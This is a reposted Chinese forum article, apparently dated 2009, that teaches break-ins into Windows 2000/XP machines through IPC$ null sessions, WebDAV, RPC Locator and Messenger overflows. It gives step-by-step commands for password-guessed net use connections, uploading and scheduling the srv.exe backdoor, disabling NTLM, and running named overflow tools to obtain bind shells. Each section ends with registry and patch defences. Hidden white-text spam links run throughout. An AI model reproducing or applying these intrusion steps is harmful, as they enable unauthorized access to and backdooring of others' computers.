【共享】利用IPC$漏洞详细入侵
利用IPC$漏洞入侵时间:2009-10-29 15:22来源:未知 作者:编辑E
一、 永恒的IPC$ 入侵难度:★★★(中等) 存在范围:★★★(中等) 危险指数:★★★★★(很高) 使用几率:★★★★★(很高) 好用指数:75% 编辑部评审意见: 众所周知,安全问题是一个极具时效的问题,就拿两年前百试不爽的.printer溢出和unicode来
一、 永恒的IPC$
入侵难度:★★★(中等)
存在范围:★★★(中等)
危险指数:★★★★★(很高)
使用几率:★★★★★(很高)
好用指数:75%
编辑部评审意见:
众所周知,安全问题是一个极具时效的问题,就拿两年前百试不爽的.printer溢出和unicode来说吧,在本年度基本上就没怎么再见有还用! [url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
然而似乎也有例外,针对IPC$问题的攻击就常用常新。
什么是IPC$漏洞:
IPC$是共享“命名管道”的资源,主要用于程序间的通讯。在远程管理计算机和查看计算机的共享资源时使用。利用默认的IPC$我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,我们就可以得目标主机上的用户列表。 [url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。 [url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的。 [url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
攻击工具:
扫描软件:流光4.71
木马软件:srv.exe
简单攻击:
1. 打开流光4.71
2. 进行扫描前的设置
3. 假设扫出127.0.0.1存在ipc$漏洞,我们进行如下操作
C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators" //这是用流光扫到的密码 [url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
C:\>copy srv.exe \\127.0.0.1\admin$ //先复制srv.exe上去,在流光的Tools目录就有 [url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
出现如下提示:
c:\winnt\system32\
已复制 1 个文件
C:\>net time \\127.0.0.1 //查时间,这里的时间是指对方计算机的,也就是我们要入侵的127.0.0.1的时间,还有要提醒大家要注意的一点是,请把时间转换为24小时制 [url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
C:\>at \\127.0.0.1 11:05 srv.exe //用at命令启动srv.exe [url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
C:\>net time \\127.0.0.1 //再查查够时间没有
C:\>telnet 127.0.0.1 99 //我们telnet吧,注意端口是99,因为这里我们用的是srv.exe。
C:\>copy ntlm.exe \\127.0.0.1\admin$ //我们再开一个DOS窗口,把ntlm.exe上传到主机上,在流光的tools目录有 [url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
C:\WINNT\system32>ntlm //运行,破坏对方机器的ntlm验证模式,使我们能通过直接连接对方的telnet模式。 [url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
C:\WINNT\system32>
C:\WINNT\system32>net start telnet //然后直接用net start telnet启动telnet [url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
Telnet 服务器正在启动.
Telnet 服务器已经启动成功。 \ C //成功
这时我们就可以直接使用TELNET 127.0.0.1连接对方了。
至此入侵结束。
如何防御:
1. 禁止建立空连接
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA] [url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
RestrictAnonymous = DWORD:00000001
2. 禁止管理共享
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] [url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
AutoShareServer = DWORD:00000000
二、 神话Webdav
入侵难度:★★★(中等)
存在范围:★★★★(高)
危险指数:★★★★★(很高)
使用几率:★★★★(高)
好用指数:65%
编辑部评审意见:
由于篇幅的限制本文在组稿过程中,我们就突出一个简单而实用的方针,那么在今年3-5月左右开始的Webdav攻击热中使用的webdav攻击方法无疑应该在我们的榜单中!
Webdav漏洞说明:
Microsoft Windows 2000 支持“万维网分布式创作和版本控制 (WebDAV)”协议。RFC 2518 中定义的 WebDAV 是超文本传输协议 (HTTP) 的一组扩展,为 Internet 上计算aIIS 服务(默认情况下在 LocalSystem 上下文中运行)的安全上下文中运行。 尽管 Microsoft 已为此弱点提供了修补程序并建议客户立即安装该修补程序,但还是提供了其他的工具和预防措施,客户在评估该修补程序的影响和兼容性时可以使用这些工具和措施来阻止此弱点被利用。 [url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
攻击工具:
扫描器:Webdavscan(是一个专门用于检测IIS 5.0 服务器是否提供了对WebDAV的支持的扫描器)
溢出程序:wdx.exe
简单攻击:
1. 使用Webdavscan对目标进行扫描、检测!
2. 使用wdx.exe进行测试,这里需要注意有耐心,可以对溢出偏移量多测试几个值。 [url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
3. 溢出成功后,使用telnet或者是nc等连接到目标主机的7788端口。
如:telnet 127.0.0.1 7788
将出现以下提示:
Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-2000 Microsoft Corp. C:\WINNT\system32>
至此入侵结束!
如何防御:
1. 搜索注册表中的如下键:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters [url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
增加如下注册表键值:
Value name: DisableWebDAV Data type: DWORD Value data: 1 2. 使用MS提供的专用补丁! 三、毁灭者RPC 入侵难度:★★(低) 存在范围:★★★★★(很高) 危险指数:★★★★★(很高) 使用几率:★★★★(高)[url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
Value name: DisableWebDAV
Data type: DWORD
Value data: 1
2. 使用MS提供的专用补丁!
三、毁灭者RPC
入侵难度:★★(低)
存在范围:★★★★★(很高)
危险指数:★★★★★(很高)
使用几率:★★★★(高)
好用指数:80%
编辑部评审意见:
小编我最爱看武侠小说了,常常看到作者这么形容一个有才华的大将:一将功成万古枯!看看案头这关于RPC蠕虫对全球经济的影响和该漏洞在漏洞领域的地位后,不由的就联系到一起了。
RPC漏洞简介:
Windows PRC Locator服务是一款映射逻辑名称到网络特定名称的名字服务。客户端使用RPC(remote procedure call)远程过程调用Locator服务,Locator服务负责把客户提交的网络名解析转换为硬盘,打印机等计算机系统上实际资源的地址。如果某一个打印机服务器逻辑名为"laserprinter",RPC客户端调用Locator服务来找出网络名所映射的"laserprinter",RPC客户端在调用RPC服务的时候使用网络名来提交请求。 [url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
不过Locator服务在接收注册信息的时候没有对Locator服务的参数进行详细检查,超长超大的参数可以导致服务程序触发缓冲区溢出,使Locator服务崩溃,精心构建提交数据可能以Locator服务进程的权限在系统上执行任意指令,而且攻击者获取的是system权限。 [url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
默认情况下Windows 2000域控制器上Locator服务是默认运行,而一般的windows工作站和服务器是默认是不开始这个服务,但是如果这些操作系统一旦启动了Locator服务就也存在着此漏洞。 [url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
攻击工具:
扫描工具:Locator Scanner(一个专门用来扫描此漏洞的命令行下运行的扫描程序,可以用它来扫描开放了RPC Locator服务的主机,要注意的是Locator Scanner只能扫描C 类网络地址。) [url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
溢出程序:Re.exe
简单入侵:
1. 进入控制台模式(cmd模式):使用命令:rpc 192.168.0.1 192.168.0.254 [url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
这样我们就找到了一个开放了Locator Service的主机,该主机的地址是:192.168.0.2。 [url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
提示:Locator Scanner的用法是:
C:\>rpc IPAddress-Start IPAddress-End
IPAddress-Start :扫描开始的IP地址
IPAddress-End:扫描结束的IP地址
2. 使用RPC的专用溢出工具进行溢出,其溢出后得到的权限是system权限。
使用命令:re -h 192.168.0.2
至此攻击入侵结束!
如何防御:
如果你的计算机不是windows网络的域控制器,那强烈建议你不要使用locator服务,如果已经开放了就关闭此服务,如何关闭Windows Locator服务是否运行,在Windows 2000和Windows XP系统下,打开“控制面板-管理工具-服务”查看 Remote procedure call(RPC)Locator服务是否启动,如果已经启动可以停止它,并将RPC Locator服务状态设置为“禁用”。 [url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
如果确实需要locator服务,那请尽快打上补丁。
四、 新贵Messager
入侵难度:★★★(中等)
存在范围:★★★★★(很高)
危险指数:★★★★★(很高)
使用几率:★★★★★(很高)
好用指数:85%
编辑部评审意见:
新近暴出的漏洞自然好用,唉,可怜了我的messager发送器了,以后恐怕就不能和同c段的mm聊天拉…… [url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
Messager漏洞简介:
Windows NT/2000/ XP/20003操作系统中有一个默认开放的Messenger(消息队列服务)。 [url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
它用于NT服务器之间进行发送和接收系统管理员或者“警报器”服务传递的消息,这个漏洞存在缓冲区堆溢出漏洞,由于在向缓冲区保存消息数据之前没有正确检查消息长度,可能被攻击者利用来进行远溢出,进行拒绝服务攻击,使计算机停止响应并自动重启,也可以执行任意代码,具体溢出问题存在于消息队列服务程序的search-by-name函数中,攻击者提交超长字符串给这个函数可造成堆溢出。 [url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]
攻击工具:
扫描工具:RetinaMSGSVC.exe(来自国外著名的安全公司eeye的ms03-043 Messenger漏洞扫描器) [url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
溢出工具:msgr.exe
简单攻击:
1. 打开RetinaMSGSVC.exe,开始对目标进行扫描。
2. 使用msgr.exe对目标进行溢出,成功后将在目标主机的9191端口绑定一个shell,便于我们进行下一步控制。 [url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
命令格式如:msgr.exe 192.168.0.2 0
3. 使用telnet命令连接到主机。
命令格式如:telnet 192.168.0.0.2 9191
至此入侵结束!
如何防御:
Messenger消息是通过NetBIOS或者RPC提交给消息服务,所以可以通过封闭NETBIOS端口(137-139)和使用防火墙过滤UDP广播包来阻挡此类消息。在边界防火墙或者个人防火墙上禁止不可信主机访问NETBIOS和RPC端口:135, 137, 138, 139 (TCP/UDP),如果不使用messenger服务可以把它禁用。打开“开始”菜单,点击“控制面板”中的“计算机管理工具”,双击“服务”,找到并双击“Messenger”,然后点击“停止”,并在“启动类型”的下拉框中选择“已禁用”。
微软也已经提供了安全补丁以修复此安全漏洞,如果有具体不同的操作系统需要下载安装不同的补丁,可以通过微软网站的安全公告选择并下载安装针对您所用系统的安全补丁。[url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
页:
[1]